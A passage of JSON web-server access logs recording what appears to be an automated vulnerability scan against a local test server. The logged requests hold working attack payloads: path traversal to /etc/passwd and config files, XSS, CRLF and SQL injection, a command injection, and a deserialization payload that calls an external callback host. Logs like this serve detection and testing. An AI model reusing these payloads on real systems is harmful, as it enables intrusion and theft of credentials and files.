+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.222","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"297MbAfF0IwhYXQYbDL9zFlxjDU.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/297MbAfF0IwhYXQYbDL9zFlxjDU.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.665","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8hs0smpv8c6ag07h0kpg8yu8o5x7oa.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"297MduQRhbsJL4R03DamdlQty5P","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 